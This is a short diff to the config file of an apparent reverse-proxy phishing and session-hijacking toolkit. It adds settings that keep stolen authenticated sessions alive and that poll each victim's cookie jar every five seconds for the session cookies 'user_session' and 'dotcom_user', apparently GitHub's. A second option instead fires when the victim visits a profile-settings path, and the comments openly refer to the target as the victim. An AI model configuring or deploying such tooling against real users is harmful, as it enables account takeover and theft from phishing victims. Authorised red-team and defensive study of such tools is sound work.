--- a/config/config.toml
+++ b/config/config.toml
@@ -139,6 +139,22 @@
     endpoint = "http://necrobrowser.url/xyz"
     profile = "./config/instrument.necro"
 
+    [necrobrowser.keepalive]
+        # GET on an authenticated endpoint to keep the session alive
+        # every keepalive request is processed as its own necrotask
+        enabled = false
+        minutes = 5    # keeps alive the session every 5 minutes
+
+
+    [necrobrowser.trigger]
+        type = "cookies"
+        values = ["user_session", "dotcom_user"]  # values can be cookies names or relative paths
+        delay = 5   # check every 5 seconds victim's cookie jar to see if we need to instrument something
+
+        # type path example (triggers when the victim goes to a specific relative URL):
+        # type = "path"
+        # values = ["/settings/profile"]
+        # delay = 5
 
 #
 # STATIC SERVER
